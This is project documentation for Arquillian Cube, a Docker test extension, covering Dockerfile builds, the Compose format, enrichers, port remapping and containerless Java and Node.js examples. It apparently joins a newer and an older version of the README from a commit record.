== Building containers\n\nTo build a container _Docker_ uses a file called +Dockerfile+ (see http:\/\/docs.docker.com\/reference\/builder\/).\n*Arquillian Cube* also supports building and running a container from a +Dockerfile+.\n\nTo indicate that *Arquillian Cube* must build the container, the +image+ property must be changed to +buildImage+, which sets the location of the +Dockerfile+.\n\nLet's see the previous example, but instead of creating a container from a predefined image, we are going to build one:\n\n[source, yaml]\n.arquillian.xml\n----\n<property name=\"dockerContainers\">\n tomcat:\n buildImage: #1\n dockerfileLocation: src\/test\/resources-tomcat-7-dockerfile\/tomcat #2\n noCache: true #3\n remove: true #4\n dockerfileName: my-dockerfile #5\n await:\n strategy: polling\n env: [JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n<\/property>\n----\n<1> The +buildImage+ section is used instead of +image+. In case both sections are present in a document, the +image+ section takes precedence over +buildImage+.\n<2> +dockerfileLocation+ contains the location of the +Dockerfile+ and all files required to build the container.\n<3> Property to enable or disable the no cache attribute.\n<4> Property to enable or disable the remove attribute.\n<5> Property to set the dockerfile name to be used instead of the default one.\n\nTIP: +dockerfileLocation+ can be a directory that contains a +Dockerfile+ in its root (in case you don't set the _dockerfileName_ property), a +tar.gz+ file, or a _URL_ pointing to a +tar.gz+ file.\n\nAn example of a +Dockerfile+ is:\n\n[source, properties]\n.src\/test\/resources-tomcat-7-dockerfile\/tomcat\/Dockerfile\n----\nFROM tutum\/tomcat:7.0\n\nENV JAVA_OPTS -Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false\nADD tomcat-users.xml \/tomcat\/conf\/ # <1>\nEXPOSE 8089\nCMD [\"\/tomcat\/bin\/catalina.sh\",\"run\"]\n----\n<1> The +tomcat-users.xml+ file is located in the same directory as the +Dockerfile+.\n\n[[docker-compose-format]]\n== Docker-Compose Format\n\nInstead of using the Arquillian Cube format, you can use the Docker Compose format to define the container layout. This means that you can use the same Docker Compose file for running your tests with Arquillian Cube and, without any change, run the `docker-compose up` command from a terminal and get the same result.\n\nIt is important to note that this is not a docker-compose implementation but only the docker-compose format. This means that for example you cannot execute some CLI commands of _docker-compose_, like starting several instances of the same service.\n\nAlso, some specific Arquillian Cube attributes, like the await strategy, cannot be configured, and the default values are going to be used.\n\nMoreover there are some docker-compose commands that are not implemented yet due to restrictions of the docker-java library. These commands are _label_, _pid_, _domainname_, _log_driver_, _security_opt_ and _read_only_. They will be implemented as soon as the docker-java library adds support for them.\n\nLastly, in case you use a command that is not implemented in Arquillian Cube, this command will be ignored (no exception will be thrown), but a log line will be printed to notify you of this situation. It is really important that you open a bug if this happens so we can add support for it. Despite this limitation, we will try to stay aligned with the latest docker-compose format.\n
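\nFor instance, a compose file like the following hypothetical sketch would still run; the _pid_ entry (one of the commands listed above as not yet implemented) is simply ignored and reported in the log:\n\n[source, yml]\n.docker-compose.yml (sketch)\n----\ntomcat:\n image: tutum\/tomcat:7.0\n pid: host # not implemented yet: ignored by Arquillian Cube, a log line is printed\n ports:\n - \"8081:8080\"\n----\n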
Let's see how you can rewrite the previous HelloWorld example with Tomcat using the docker-compose format.\n\nFirst let's create a file called `envs` in the root of the project, which configures the environment variables:\n\n[source]\n.envs\n----\nTOMCAT_PASS=mypass\nJAVA_OPTS=-Djava.rmi.server.hostname=localhost -Dcom.sun.management.jmxremote.rmi.port=8088 -Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false\n----\n\nThen you can create a file called `docker-compose.yml` following the docker-compose conventions in the root of the project:\n\n[source, yml]\n.docker-compose.yml\n----\ntomcat:\n env_file: envs\n image: tutum\/tomcat:7.0\n ports:\n - \"8089:8089\"\n - \"8088:8088\"\n - \"8081:8080\"\n----\n\nand finally you can configure in the `arquillian.xml` file that you want to use the docker-compose format.\n\n[source, xml]\n.src\/test\/resources\/arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.13<\/property>\n <property name=\"serverUri\">localhost<\/property>\n <property name=\"definitionFormat\">COMPOSE<\/property>\n <property name=\"dockerContainersFile\">docker-compose.yml<\/property>\n<\/extension>\n\n<container qualifier=\"tomcat\">\n <configuration>\n <property name=\"host\">${docker.tomcat.host}<\/property>\n <property name=\"httpPort\">8081<\/property>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nAnd that's all; you can now reuse your existing docker-compose files in Arquillian Cube too.\nYou can see the full example at: https:\/\/github.com\/arquillian\/arquillian-cube\/tree\/master\/docker\/ftest-docker-compose\n\n== Enrichers\n\n*Arquillian Cube* comes with a few enrichers.\n\nOne for injecting the +CubeID+ (_containerId_) of the current container created for executing the test, one that injects the +CubeController+ to call lifecycle methods on any cube, and one that injects the +com.github.dockerjava.api.DockerClient+ instance used to communicate with the _Docker_ server.\n\nDockerClient injection only works if the tests are run in client mode, that is, by using +@RunAsClient+ or by setting the testable property to false with +@Deployment(testable = false)+.\n\nThese can be injected using the +@ArquillianResource+ annotation.\n\nAs examples:\n\n[source, java]\n.CubeIDResourceProvider.java\n----\n@ArquillianResource\nCubeID containerId;\n----\n\n[source, java]\n.CubeResourceProvider.java\n----\n@ArquillianResource\nDockerClient dockerClient;\n----\n\n[source, java]\n.CubeControllerProvider.java\n----\n@ArquillianResource\nCubeController cubeController;\n----\n
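\nAs a quick illustration of the +CubeController+ enricher, the following sketch restarts a cube from inside a test. It assumes lifecycle methods named +stop+ and +start+ that take the cube id, and a cube named _tomcat_ as defined in the earlier examples:\n\n[source, java]\n.CubeLifecycleTest.java\n----\n@RunWith(Arquillian.class)\npublic class CubeLifecycleTest {\n\n @ArquillianResource\n CubeController cubeController; \/\/ injected by the Arquillian Cube enricher\n\n @Test\n public void should_restart_tomcat_cube() {\n \/\/ stop and start again the cube named 'tomcat'\n cubeController.stop(\"tomcat\");\n cubeController.start(\"tomcat\");\n }\n}\n----\n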
=== Auto starting Cubes outside of Arquillian Containers\n\nProbably any application you write will need an application\/servlet container, but also other servers like a database server or a mail server.\nEach one will be placed in its own _Docker Container_.\nSo for example a full application may contain one _Docker Container_ with an application server (for example _Wildfly_) and another container with a database (for example _H2_).\n\n*Arquillian Cube* can orchestrate these containers as well.\n\nAn example of orchestration can be:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"autoStartContainers\">database<\/property> <!--1-->\n<property name=\"dockerContainers\">\n wildfly_database:\n extends: wildfly\n links:\n - database:database #2\n database:\n image: zhilvis\/h2-db\n exposedPorts: [81\/tcp, 1521\/tcp]\n await:\n strategy: polling\n portBindings: [1521\/tcp, 8181->81\/tcp]\n <\/property>\n\n<container qualifier=\"wildfly_database\">\n <configuration>\n <property name=\"target\">wildfly:8.1.0.Final:remote<\/property>\n <property name=\"managementPort\">9991<\/property>\n <property name=\"username\">admin<\/property>\n <property name=\"password\">Admin#70365<\/property>\n <\/configuration>\n<\/container>\n----\n<1> This property is used to start containers before any test is executed. In this case the _database_ container.\n<2> We use the _links_ property to connect the _Wildfly_ container to the _database_ container.\n\nIn this case, when a test is started both containers are started, and when both are ready to receive requests the test is executed.\n\nAnd the datasource definition shall be:\n\n[source, java]\n.UserRepository.java\n----\n@DataSourceDefinition(\n name = \"java:app\/TestDataSource\",\n className = \"org.h2.jdbcx.JdbcDataSource\",\n url = \"jdbc:h2:tcp:\/\/database:1521\/opt\/h2-data\/test\",\n user = \"sa\",\n password = \"sa\"\n)\n@Stateless\npublic class UserRepository {\n\n @PersistenceContext\n private EntityManager em;\n\n public void store(User user) {\n em.persist(user);\n }\n}\n----\n\n=== Auto-Remapping\n\n*Arquillian Cube* can automatically configure the default ports of a container in case of port forwarding.\n\nWhat *Arquillian Cube* does internally is remap the default `DeployableContainer` port values to the ones configured in the _Docker Containers_ configuration.\n\nSuppose you have a _Docker Container_ configuration like:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"dockerContainers\">\n tomcat_default:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8081->8080\/tcp] #1\n<\/property>\n----\n<1> Note that container port 8080 is published on port 8081.\n\nThen in theory you should configure the remote _Tomcat_ adapter to port 8081 in your _arquillian.xml_ file.\nBut let's say that you are using that remote adapter for a _Tomcat_ on your local machine (outside _Docker_) too, and it is configured to use port 8080.\n\n[source, xml]\n.arquillian.xml\n----\n<container qualifier=\"tomcat_default\">\n <configuration>\n <property name=\"host\">localhost<\/property>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nThis basically uses the default port (8080) to connect to the remote server.\n\nIn this case you don't need to create a new `container` tag; *Arquillian Cube* is smart enough to change the default port value automatically, in the case of _Tomcat_ from 8080 to 8081.\n*Arquillian Cube* will apply auto-remapping to all properties that contain `port` as a substring of the property name, and will remap them if necessary.\n\nNOTE: Auto-remapping only works in case you want to change the default server port to a _Docker_ port-forwarded port.\n
=== DockerServerIp and Containers\n\nIf you are using a remote docker server (not on _localhost_), or for example _boot2docker_, you may want to set that ip in the Arquillian remote adapter configuration so it can deploy the archive under test.\nIn these cases you can hardcode this ip in the Arquillian container adapter configuration, or you can use the special tag +dockerServerIp+.\nAt runtime this tag will be replaced by _Arquillian Cube_ with the docker server ip configured in the +serverUri+ parameter.\nThis replacement only works in properties that contain the string +host+ or +address+ in the property name.\n\nSo for example:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverUri\">http:\/\/192.168.0.2:2756<\/property> <!--1-->\n ...\n<\/extension>\n<container qualifier=\"tomcat_default\">\n <configuration>\n <property name=\"host\">dockerServerIp<\/property> <!--2-->\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n<1> We set the +serverUri+ as usual.\n<2> +dockerServerIp+ is replaced at runtime.\n\nThe +host+ property will be replaced automatically with +192.168.0.2+.\n\nNOTE: This also works in case you set +serverUri+ using the +boot2docker+ special word or by using the defaults. Read more about it in the <<boot2docker, Boot2Docker section>> and the <<automatic-resolution, Automatic serverUri resolution section>>.\n\nIn case of using a _unix_ socket, +dockerServerIp+ is replaced with _localhost_.\n\nAlso _Arquillian Cube_ can help you in another way by inferring the +boot2docker+ ip.\nIn case you are running on _MacOS_ or _Windows_ with +boot2docker+, you may not need to set the host property at all, nor use +dockerServerIp+.\n_Arquillian Cube_ will inspect any property in the configuration class that contains the word _address_ or _host_ and that is not overridden in `arquillian.xml`, and it will set the +boot2docker+ server ip automatically.\n\nSo the previous example could be modified to:\n\n[source, xml]\n.arquillian.xml\n----\n<container qualifier=\"tomcat_default\">\n <configuration>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nAnd in case you are running on _Windows_ or _MacOS_, the `host` property will be automatically set to the +boot2docker+ _ip_.\n\n== Containerless Server and Docker\n\nIn all previous sections we have seen that the application is deployed inside a container.\nFor example in the case of a _Tomcat_ application, resources are deployed inside a _Servlet_ container, or in the case of _Apache TomEE_ you can deploy _EJBs_ inside an _EJB_ container.\n\nBut nowadays there are other kinds of applications that contain the container (if they have one) embedded inside them.\nTypically these applications use an embedded server and are run as _CLI_ applications.\nSome examples are _Spring Boot_, _Netty_, _SparkJava_ or _Undertow_.\n\nIf you are using some of these technologies with _Docker_, you can still use *Arquillian Cube* to write your tests.\n\n=== Java Embedded Servers\n\nLet's suppose we are writing a service which should return the current day and time as text.\nTo serve this service to the world we decide to use the _Undertow_ embedded server.\n\nThe code looks like:\n\n[source, java]\n.DaytimeServer.java\n----\nimport io.undertow.Undertow;\nimport io.undertow.server.HttpHandler;\nimport io.undertow.server.HttpServerExchange;\nimport io.undertow.util.Headers;\n\nimport java.text.SimpleDateFormat;\nimport java.util.Date;\n\npublic class DaytimeServer {\n\n public static void main(String[] args) { \/\/<1>\n\n Undertow server = Undertow.builder()\n .addHttpListener(8080, \"0.0.0.0\")\n .setHandler(new HttpHandler() {\n @Override\n public void handleRequest(final HttpServerExchange exchange) throws Exception {\n SimpleDateFormat simpleDateFormat = new SimpleDateFormat();\n 
exchange.getResponseHeaders().put(Headers.CONTENT_TYPE, \"text\/plain\");\n exchange.getResponseSender().send(simpleDateFormat.format(new Date()) + System.lineSeparator()); \/\/<2>\n }\n }).build();\n server.start();\n }\n}\n----\n<1> This class is a CLI application.\n<2> Returns a text with the day and time formatted with +SimpleDateFormat+.\n\nNote that this application is a CLI application, which is pretty different from the previous examples.\nPreviously the packaged application was deployed inside an application server, which in fact means that *Arquillian* connects to the server and tells it to deploy that file.\n\nIn this example there is no application server or servlet container waiting for *Arquillian* to deploy an archive; the application is self-contained, it contains everything.\nSo in fact if you want to run the application you will probably end up doing something like +java -jar daytime.jar+.\n\nSo how do you write a test for these classes if we are using _Docker_ as the runtime container?\n\nThe first thing to do is add the +arquillian-cube-containerless+ dependency.\n\n[source, xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.arquillian.cube<\/groupId>\n <artifactId>arquillian-cube-containerless<\/artifactId>\n <version>${arquillian.cube.version}<\/version>\n<\/dependency>\n----\n\nThe next step is creating a +Dockerfile+.\nThis is required because we need to set not only the container image to be used but also how to run the application.\nBut note that there is a problem with creating a +Dockerfile+ in this case.\nThe +jar+ name is not static because it depends on the name you give during the creation of the archive (using _Shrinkwrap_).\nSo in fact the +Dockerfile+ should be templatized.\nAnd this is something that *Arquillian Cube* can do for you.\nThe idea is to create a file called +DockerfileTemplate+.\n\n[source, terminal]\n.src\/test\/resources\/daytime\/DockerfileTemplate\n----\nFROM java:7\n\nWORKDIR \/usr\/src\/server\nCOPY ${deployableFilename} \/usr\/src\/server\/${deployableFilename} #1\nEXPOSE 8080\nCMD [\"java\", \"-jar\", \"${deployableFilename}\"]\n----\n<1> +${deployableFilename}+ will be replaced at runtime by the name of the +jar+ file created by _Shrinkwrap_.\n
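\nSo, assuming the archive created by the test below is named +daytime.jar+, the template would be resolved at runtime to something like the following sketch (shown only to illustrate the substitution):\n\n[source, terminal]\n.Resolved Dockerfile (sketch)\n----\nFROM java:7\n\nWORKDIR \/usr\/src\/server\nCOPY daytime.jar \/usr\/src\/server\/daytime.jar\nEXPOSE 8080\nCMD [\"java\", \"-jar\", \"daytime.jar\"]\n----\n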
Then we need to touch the +arquillian.xml+ file by setting a special container definition so *Arquillian* doesn't crash trying to deploy the archive into an undefined container.\n\n[source, xml]\n.src\/test\/resources\/arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"dockerContainers\"> <!--1-->\n daytime:\n buildImage: <!--2-->\n dockerfileLocation: src\/test\/resources\/undertow <!--3-->\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"containerless\" default=\"true\"> <!--4-->\n <configuration>\n <property name=\"containerlessDocker\">daytime<\/property> <!--5-->\n <property name=\"embeddedPort\">8080<\/property> <!--6-->\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> The Docker container is defined as usual.\n<2> The buildImage attribute is used to define the dockerfile location.\n<3> This attribute sets the directory where the +Dockerfile+ is stored. In fact in this case it is the directory where the +DockerfileTemplate+ file is stored.\n<4> A container provided by *Arquillian Cube* must be defined.\n<5> This property is used to set which container must be started.\n<6> This property sets the port exposed by the embedded server.\n\nAnd finally the test:\n\n[source, java]\n.DaytimeTest.java\n----\n@RunWith(Arquillian.class)\npublic class DaytimeTest {\n\n private static final String LINE_SEPARATOR = System\n .getProperty(\"line.separator\");\n\n @Deployment(testable = false) \/\/<1>\n public static JavaArchive createDeployment() {\n JavaArchive[] undertow = Maven.resolver().resolve(\"io.undertow:undertow-core:1.1.1.Final\").withTransitivity().as(JavaArchive.class); \/\/<2>\n\n JavaArchive jar = ShrinkWrap\n .create(JavaArchive.class, \"daytime.jar\")\n .addClass(DaytimeServer.class); \/\/<3>\n\n for (JavaArchive javaArchive : undertow) { \/\/<4>\n jar.merge(javaArchive);\n }\n\n jar.addAsManifestResource(\n new StringAsset(\n \"Main-Class: org.arquillian.cube.impl.containerless.DaytimeServer\"\n + LINE_SEPARATOR), \"MANIFEST.MF\"); \/\/<5>\n return jar;\n }\n\n @Test\n public void shouldReturnDateFromDaytimeServer(@ArquillianResource URL base) { \/\/<6>\n try (\n BufferedReader in = new BufferedReader(new InputStreamReader(\n base.openStream()));) {\n String userInput = in.readLine();\n assertThat(userInput, notNullValue());\n } catch (UnknownHostException e) {\n fail(\"Don't know about host \");\n } catch (IOException e) {\n fail(\"Couldn't get I\/O for the connection to \");\n }\n }\n}\n----\n<1> Tests should be run as-client.\n<2> The _ShrinkWrap_ Maven resolver gets all dependencies for _Undertow_.\n<3> Create a +jar+ file called +daytime.jar+ with the +DaytimeServer+ class.\n<4> The +Undertow+ dependencies are merged inside the +jar+.\n<5> Because it is a runnable +jar+, the +MANIFEST+ is created accordingly.\n<6> Simple test.\n\n=== Polyglot Applications\n\nIn the previous section we have seen that we can test any _Java_ _CLI_ application that offers a socket connection.\nBut if you think about it, there is nothing that prevents *Arquillian Cube* from deploying applications developed in other languages like _Node.js_, _Play_, _Ruby on Rails_, ...\n\nLet's see an example of how you can use *Arquillian Cube* to test a _Node.js_ _hello world_ application.\n\nThe first thing to do is create the _Node.js_ application.\n\n[source, json]\n.src\/main\/js\/package.json\n----\n{\n \"name\": \"helloworld-server\",\n \"version\": \"0.0.1\",\n \"description\": \"A NodeJS webserver to run inside a docker container\",\n \"author\": \"asotobu@gmail.com\",\n \"license\": \"APLv2\",\n \"dependencies\": {\n \"express\": \"*\"\n },\n \"scripts\": {\"start\": \"node index.js\"}\n}\n----\n\n[source, javascript]\n.src\/main\/js\/index.js\n----\nvar express = require('express');\n\nvar app = express();\n\napp.get('\/', function(req, res){\n res.send('Hello from inside a container!');\n});\n\napp.listen(8080);\n----\n\nThen we need to define a +DockerfileTemplate+ as we did for +Undertow+.\n\n[source]\n.src\/test\/resources\/node\/DockerfileTemplate\n----\nFROM node:0.11.14\n\nRUN mkdir -p \/usr\/src\/app\nWORKDIR \/usr\/src\/app\n\nADD ${deployableFilename} \/usr\/src\/app #1\nRUN npm install\nEXPOSE 8080\n\nCMD [ \"npm\", \"start\" ]\n----\n<1> We need to use the +ADD+ command to add the deployed file instead of +COPY+. 
We are going to see why below.\n\nFinally, the +arquillian.xml+ configuration file:\n\n[source, xml]\n.arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"dockerContainers\">\n node:\n buildImage:\n dockerfileLocation: src\/test\/resources\/node\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"containerless\" default=\"true\">\n <configuration>\n <property name=\"containerlessDocker\">node<\/property> <!--1-->\n <property name=\"embeddedPort\">8080<\/property>\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> This property is used to set which container must be started. In this case +node+.\n\nAnd finally the *Arquillian* test.\n\n[source, java]\n.NodeTest.java\n----\n@RunWith(Arquillian.class)\npublic class NodeTest {\n\n @Deployment(testable = false) \/\/<1>\n public static GenericArchive createDeployment() {\n return ShrinkWrap.create(GenericArchive.class, \"app.tar\") \/\/<2>\n .add(new ClassLoaderAsset(\"index.js\"), \"index.js\")\n .add(new ClassLoaderAsset(\"package.json\"), \"package.json\");\n }\n\n @Test\n public void shouldReturnMessageFromNodeJs(@ArquillianResource URL base) { \/\/<3>\n try (BufferedReader in = new BufferedReader(new InputStreamReader(\n base.openStream()));) {\n String userInput = in.readLine();\n assertThat(userInput, is(\"Hello from inside a container!\"));\n } catch (UnknownHostException e) {\n fail(\"Don't know about host \");\n } catch (IOException e) {\n fail(\"Couldn't get I\/O for the connection to \");\n }\n }\n}\n----\n<1> Tests should be run as-client.\n<2> A +GenericArchive+ with the +tar+ extension must be created using _Shrinkwrap_.\n<3> Simple test.\n\nNOTE: The +GenericArchive+ name must end with the +tar+ extension because that is what *Arquillian Cube* expects. When you use +ADD+ in a +Dockerfile+, _Docker_ will automatically untar the file to the given location.\n\n== Future work\n\nThe API will continuously evolve to fit the requirements of an enterprise application, as well as providing integration with _Kubernetes_ and other Docker related tools.\nAlso some configuration parameters may be modified to fit new requirements.\nAlthough we are going to try not to break compatibility with previous versions, we cannot guarantee it until the _beta_ stage.\n\nFeel free to use it, and if you find a missing feature, a bug, or anything else, feel free to open a new issue.\n","old_contents":"= Arquillian Cube\n\nDocumentation for version Alpha3 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha3\/README.adoc\n\nDocumentation for version Alpha2 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha2\/README.adoc\n\nDocumentation for version Alpha1 can be found here: https:\/\/github.com\/arquillian\/arquillian-cube\/blob\/1.0.0.Alpha1\/README.adoc\n\n\nWARNING: 1.0.0.Alpha7 breaks compatibility with previous versions in some cases. 
The major difference is that instead of using the _boot2docker_ keyword to refer to the auto-resolved boot2docker ip in the _serverUri_ parameter, you should now use _dockerHost_.\n\n== What is this?\n\n*Arquillian Cube* is an _Arquillian_ extension that can be used to manage _Docker_ containers from _Arquillian_.\n\nThe extension is named *Cube* for two reasons:\n\n* Because Docker is like a cube\n* Because the http:\/\/en.memory-alpha.org\/wiki\/Borg_cube[Borg starship] is named *cube*, and since we are moving tests closer to production we can say that \"any resistance is futile, bugs will be assimilated\".\n\nWith this extension you can start a _Docker_ container with a server installed, deploy the required deployable file within it and execute _Arquillian_ tests.\n\nThe key point here is that if _Docker_ is used as the deployment platform in production, your tests are executed in the same container as will be used in production, so your tests are even more real than before.\n\nIt also lets you start a container with every required service, like a database or a mail server, and instead of stubbing or using fake objects your tests can use real servers.\n\n[WARNING]\n====\nThis extension has been developed and tested on a Linux machine with the _Docker_ server already installed.\nIt works with *Boot2Docker* as well on _Windows_ and _MacOS_ machines, but some parameters like the _host ip_ must be the _Boot2Docker_ server instead of _localhost_ (in case you have the _Docker_ server installed inside your own machine).\n\nOne of the best resources to learn about why using _Boot2Docker_ is different from using _Docker_ on Linux can be read here: http:\/\/viget.com\/extend\/how-to-use-docker-on-os-x-the-missing-guide\n====\n\n== Preliminaries\n\n*Arquillian Cube* relies on the https:\/\/github.com\/docker-java\/docker-java[docker-java] API.\n\nTo use *Arquillian Cube* you need a _Docker_ daemon running on a computer (it can be local or not), but probably it will be local.\n\nBy default the _Docker_ server uses UNIX sockets for communicating with the _Docker_ client. 
*Arquillian Cube* will attempt to detect the operating system it is running on and either set _docker-java_ to use a UNIX socket on _Linux_ or to <<Boot2Docker>> on _Windows_\/_Mac_ as the default URI.\n\nIf you want to use TCP\/IP to connect to the Docker server, you'll need to make sure that your _Docker_ server is listening on a TCP port.\nTo allow the _Docker_ server to use TCP, add the following line to +\/etc\/default\/docker+:\n\n+DOCKER_OPTS=\"-H tcp:\/\/127.0.0.1:2375 -H unix:\/\/\/var\/run\/docker.sock\"+\n\nAfter restarting the _Docker_ daemon you need to make sure that _Docker_ is up and listening on TCP.\n\n[source, terminal]\n----\n$ docker -H tcp:\/\/127.0.0.1:2375 version\n\nClient version: 0.8.0\nGo version (client): go1.2\nGit commit (client): cc3a8c8\nServer version: 1.2.0\nGit commit (server): fa7b24f\nGo version (server): go1.3.1\n----\n\nIf you cannot see the client and server versions then it means that something is wrong with the _Docker_ installation.\n\n== Basic Example\n\nAfter having a _Docker_ server installed we can start using *Arquillian Cube*.\nIn this case we are going to use a very simple example using a _Docker_ image with _Apache Tomcat_, and we are going to test a _Servlet_ on it.\n\n[source, java]\n.HelloWorldServlet.java\n----\n@WebServlet(\"\/HelloWorld\")\npublic class HelloWorldServlet extends HttpServlet {\n\n @Override\n protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n PrintWriter writer = resp.getWriter();\n writer.println(\"Hello World\");\n }\n}\n----\n\n[source, java]\n.HelloWorldServletTest.java\n----\n@RunWith(Arquillian.class)\npublic class HelloWorldServletTest {\n\n @Deployment(testable=false) \/\/<1>\n public static WebArchive create() {\n return ShrinkWrap.create(WebArchive.class, \"hello.war\").addClass(HelloWorldServlet.class); \/\/<2>\n }\n\n @Test\n public void should_return_hello_world(@ArquillianResource URL resource) throws IOException { \/\/<3>\n\n URL obj = new URL(resource, \"HelloWorld\");\n HttpURLConnection con = (HttpURLConnection) obj.openConnection();\n con.setRequestMethod(\"GET\");\n\n BufferedReader in = new BufferedReader(\n new InputStreamReader(con.getInputStream()));\n String inputLine;\n StringBuffer response = new StringBuffer();\n\n while ((inputLine = in.readLine()) != null) {\n response.append(inputLine);\n }\n in.close();\n\n assertThat(response.toString(), is(\"Hello World\")); \/\/<4>\n }\n}\n----\n<1> In this case we are running the test as a client. So in fact this test is executed against the container instead of inside the container.\n<2> No changes in this part; we need to create a deployable file, and because we are testing against _Tomcat_, a _war_ file is created.\n<3> Because the test is run as a client, we can use +@ArquillianResource+ to get the URL where the file is deployed. 
Note that this will be the URL to access _Tomcat_ running inside the _Docker_ container.\n<4> Typical JUnit assertion on the servlet response.\n\nNow this test could be run in any container; there is nothing that ties it to _Docker_.\nThe next step is adding some dependencies apart from the typical _Arquillian_ dependencies.\n\n[source, xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.arquillian.cube<\/groupId>\n <artifactId>arquillian-cube-docker<\/artifactId> <!--1-->\n <version>${project.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n\n<dependency>\n <groupId>org.jboss.arquillian.container<\/groupId>\n <artifactId>arquillian-tomcat-remote-7<\/artifactId> <!--2-->\n <version>1.0.0.CR7<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n<1> Adds the *Arquillian Cube* dependency.\n<2> From the point of view of _Arquillian_, _Tomcat_ is being executed on a remote host (in fact this is true because _Tomcat_ is running inside _Docker_, which is external to _Arquillian_), so we need to add the remote adapter.\n\nAnd finally we need to configure the _Tomcat_ remote adapter and *Arquillian Cube* in the +arquillian.xml+ file.\n\n[source, xml]\n.arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\"> <!--1-->\n <property name=\"serverVersion\">1.12<\/property> <!--2-->\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property> <!--3-->\n <property name=\"dockerContainers\"> <!--4-->\n tomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"tomcat\" default=\"true\"> <!--5-->\n <configuration>\n <property name=\"host\">localhost<\/property> <!--6-->\n <property name=\"httpPort\">8080<\/property> <!--7-->\n <property name=\"user\">admin<\/property> <!--8-->\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> The *Arquillian Cube* extension is registered.\n<2> The _Docker_ server version is required.\n<3> The _Docker_ server URI is required. In case you are using a remote _Docker_ host or _Boot2Docker_ you need to set the remote host ip here, but in this case the _Docker_ server is on the same machine.\n<4> A _Docker_ container has a lot of parameters that can be configured. To avoid having to create one XML property for each one, YAML content can be embedded directly as a property.\n<5> Configuration of the _Tomcat_ remote adapter. Cube will start the _Docker_ container when it is run in the same context as an _Arquillian_ container with the same name.\n<6> Host can be _localhost_ because there is port forwarding between the container and the _Docker_ server.\n<7> The port is exposed as well.\n<8> User and password are required to deploy the war file to the remote _Tomcat_.\n\nAnd that's all.\nNow you can run your test and you will see how the _tutum\/tomcat:7.0_ image is downloaded and started.\nPorts 8080 (Tomcat standard port) and 8089 (JMX port used by Arquillian) are exposed.\nFinally, in the _env_ section, environment variables are set. 
